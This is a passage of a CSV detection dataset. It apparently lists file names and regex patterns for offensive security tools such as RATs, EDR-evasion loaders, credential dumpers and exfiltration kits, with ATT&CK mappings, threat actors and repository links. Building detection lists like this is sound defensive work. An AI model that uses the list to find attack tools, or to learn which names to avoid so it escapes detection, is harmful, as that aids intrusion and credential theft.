syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","0","N/A","N/A","10","1","49","6","2024-02-12T17:51:24Z","2023-07-11T09:07:10Z","15861" "*\Hypnos-main\*",".{0,1000}\\Hypnos\-main\\.{0,1000}","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","0","N/A","N/A","10","1","49","6","2024-02-12T17:51:24Z","2023-07-11T09:07:10Z","15862" "*\iamassumeroleenum.py*",".{0,1000}\\iamassumeroleenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","15863" "*\iat_obfuscation.exe*",".{0,1000}\\iat_obfuscation\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","15864" "*\icebreaker.py*",".{0,1000}\\icebreaker\.py.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential 
Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","15865" "*\IceRat v 1.0.exe*",".{0,1000}\\IceRat\sv\s1\.0\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15866" "*\icmp_exfiltration.py*",".{0,1000}\\icmp_exfiltration\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","15867" "*\identify_offencive_tools.log*",".{0,1000}\\identify_offencive_tools\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","15869" "*\IdentifyDomainAdmins.ahk*",".{0,1000}\\IdentifyDomainAdmins\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - 
T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","15870" "*\IdentifyGroupMembershipActiveUser.ahk*",".{0,1000}\\IdentifyGroupMembershipActiveUser\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","15871" "*\IDiagnosticProfileUAC*",".{0,1000}\\IDiagnosticProfileUAC.{0,1000}","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","0","N/A","N/A","10","2","182","32","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z","15872" "*\iepv.cfg*",".{0,1000}\\iepv\.cfg.{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15873" "*\iepv.exe*",".{0,1000}\\iepv\.exe.{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","BlackSuit - 
Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15874" "*\IEPV.EXE-*.pf*",".{0,1000}\\IEPV\.EXE\-.{0,1000}\.pf.{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15875" "*\iepv.zip.lnk*",".{0,1000}\\iepv\.zip\.lnk.{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15876" "*\iFire-readme.txt*",".{0,1000}\\iFire\-readme\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15877" "*\Ignis RAT V1_YKW.exe*",".{0,1000}\\Ignis\sRAT\sV1_YKW\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15878" "*\IHxExec.cpp*",".{0,1000}\\IHxExec\.cpp.{0,1000}","offensive_tool_keyword","IHxExec","Process injection technique","T1055.001 - 
T1055","TA0005 - TA0004 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CICADA8-Research/IHxExec","1","0","N/A","N/A","8","4","325","46","2024-09-06T07:58:41Z","2024-07-11T09:18:42Z","15879" "*\IHxExec.exe*",".{0,1000}\\IHxExec\.exe.{0,1000}","offensive_tool_keyword","IHxExec","Process injection technique","T1055.001 - T1055","TA0005 - TA0004 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CICADA8-Research/IHxExec","1","0","N/A","N/A","8","4","325","46","2024-09-06T07:58:41Z","2024-07-11T09:18:42Z","15880" "*\IHxExec.vcxproj*",".{0,1000}\\IHxExec\.vcxproj.{0,1000}","offensive_tool_keyword","IHxExec","Process injection technique","T1055.001 - T1055","TA0005 - TA0004 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CICADA8-Research/IHxExec","1","0","N/A","N/A","8","4","325","46","2024-09-06T07:58:41Z","2024-07-11T09:18:42Z","15881" "*\IHxExec-main*",".{0,1000}\\IHxExec\-main.{0,1000}","offensive_tool_keyword","IHxExec","Process injection technique","T1055.001 - T1055","TA0005 - TA0004 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CICADA8-Research/IHxExec","1","0","N/A","N/A","8","4","325","46","2024-09-06T07:58:41Z","2024-07-11T09:18:42Z","15882" "*\iis_controller.py*",".{0,1000}\\iis_controller\.py.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","N/A","10","10","541","124","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z","15883" "*\Ikeext-Privesc*",".{0,1000}\\Ikeext\-Privesc.{0,1000}","offensive_tool_keyword","Ikeext-Privesc","Windows IKEEXT DLL Hijacking Exploit Tool","T1546.011 - T1574.009 - T1036.004","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/securycore/Ikeext-Privesc","1","0","N/A","N/A","10","1","33","52","2018-02-25T13:45:15Z","2018-02-27T11:18:56Z","15884" 
"*\IMAP-Clear-Text-Password-*.txt*",".{0,1000}\\IMAP\-Clear\-Text\-Password\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","15885" "*\Imminent Monitor 3.9.exe*",".{0,1000}\\Imminent\sMonitor\s3\.9\.exe.{0,1000}","offensive_tool_keyword","Imminent-Monitor","used for malicious activities such as keylogging - screen capture and remote control of infected systems.","T1012 - T1059 - T1105 - T1071 - T1124 - T1041","TA0005 - TA0003 - TA0011 - TA0009","Imminent RAT","PROMETHIUM","Malware","https://github.com/Indestructible7/Imminent-Monitor-v3.9","1","0","N/A","N/A","8","1","4","2","2022-11-04T18:48:14Z","2022-11-04T18:15:20Z","15886" "*\ImminentMonitor.exe*",".{0,1000}\\ImminentMonitor\.exe.{0,1000}","offensive_tool_keyword","Imminent-Monitor","used for malicious activities such as keylogging - screen capture and remote control of infected systems.","T1012 - T1059 - T1105 - T1071 - T1124 - T1041","TA0005 - TA0003 - TA0011 - TA0009","Imminent RAT","PROMETHIUM","Malware","https://github.com/Indestructible7/Imminent-Monitor-v3.9","1","0","N/A","N/A","8","1","4","2","2022-11-04T18:48:14Z","2022-11-04T18:15:20Z","15887" "*\impacket.*",".{0,1000}\\impacket\..{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15888" "*\impacket.zip*",".{0,1000}\\impacket\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","15889" "*\impacketfile.py*",".{0,1000}\\impacketfile\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","15890" "*\impacket-out\*",".{0,1000}\\impacket\-out\\.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","15891" "*\Imperium RAT Cracked\*",".{0,1000}\\Imperium\sRAT\sCracked\\.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - 
T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15892" "*\Impersonate.exe*",".{0,1000}\\Impersonate\.exe.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","N/A","N/A","10","4","301","38","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z","15893" "*\impersonate.py*",".{0,1000}\\impersonate\.py.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","N/A","N/A","10","4","301","38","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z","15894" "*\impersonate.py*",".{0,1000}\\impersonate\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","15895" "*\Impersonate\Impersonate.cpp*",".{0,1000}\\Impersonate\\Impersonate\.cpp.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","N/A","N/A","10","4","301","38","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z","15896" "*\Implant.exe *",".{0,1000}\\Implant\.exe\s.{0,1000}","offensive_tool_keyword","GithubC2","Github as C2","T1095 - 
T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","N/A","10","10","136","37","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z","15897" "*\implant.exe *.exe",".{0,1000}\\implant\.exe\s.{0,1000}\.exe","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","N/A","10","2","170","24","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z","15898" "*\Implants\powershell.ps1*",".{0,1000}\\Implants\\powershell\.ps1.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","N/A","10","10","91","20","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z","15899" "*\ImplantSSP.exe*",".{0,1000}\\ImplantSSP\.exe.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","15900" "*\ImSecureRat.exe*",".{0,1000}\\ImSecureRat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15901" "*\InactiveDomainAdmins.csv*",".{0,1000}\\InactiveDomainAdmins\.csv.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","N/A","8","3","282","57","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z","15902" "*\inceptor.py*",".{0,1000}\\inceptor\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","15903" "*\include\KaynStrike.h*",".{0,1000}\\include\\KaynStrike\.h.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","0","N/A","N/A","9","5","422","66","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z","15904" "*\include\kerberoast.h*",".{0,1000}\\include\\kerberoast\.h.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","15905" "*\INC-README.html*",".{0,1000}\\INC\-README\.html.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns 
retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15906" "*\INC-README.txt*",".{0,1000}\\INC\-README\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15907" "*\INC-README2.txt*",".{0,1000}\\INC\-README2\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15908" "*\INC-README3.txt*",".{0,1000}\\INC\-README3\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15909" "*\INC-README4.txt*",".{0,1000}\\INC\-README4\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15910" "*\InflativeLoading.py*",".{0,1000}\\InflativeLoading\.py.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense 
Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","15911" "*\InflativeLoading\bin\*.bin*",".{0,1000}\\InflativeLoading\\bin\\.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","15912" "*\InflativeLoading\bin\*.exe*",".{0,1000}\\InflativeLoading\\bin\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","15913" "*\InflativeLoading-main.zip*",".{0,1000}\\InflativeLoading\-main\.zip.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","15914" "*\InfoGrab.dll*",".{0,1000}\\InfoGrab\.dll.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","15915" "*\inject_shellcode.py*",".{0,1000}\\inject_shellcode\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","15916" "*\InjectedDLL.cpp*",".{0,1000}\\InjectedDLL\.cpp.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","15918" "*\injector.ps1 1 *",".{0,1000}\\injector\.ps1\s1\s.{0,1000}","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","N/A","9","4","328","44","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z","15919" "*\injector.ps1 2 *",".{0,1000}\\injector\.ps1\s2\s.{0,1000}","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","N/A","9","4","328","44","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z","15920" 
"*\inline-shellcode-test.c*",".{0,1000}\\inline\-shellcode\-test\.c.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","0","N/A","N/A","10","9","840","147","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z","15921" "*\install_elevated.py*",".{0,1000}\\install_elevated\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","15922" "*\InstallShellcode.exe*",".{0,1000}\\InstallShellcode\.exe.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","N/A","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","15923" "*\InstallStager.exe*",".{0,1000}\\InstallStager\.exe.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","15924" "*\InstallStager.pdb*",".{0,1000}\\InstallStager\.pdb.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote 
Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","15925" "*\interesting-teamsmessages.csv*",".{0,1000}\\interesting\-teamsmessages\.csv.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","15926" "*\InternalMonologue.exe*",".{0,1000}\\InternalMonologue\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","15927" 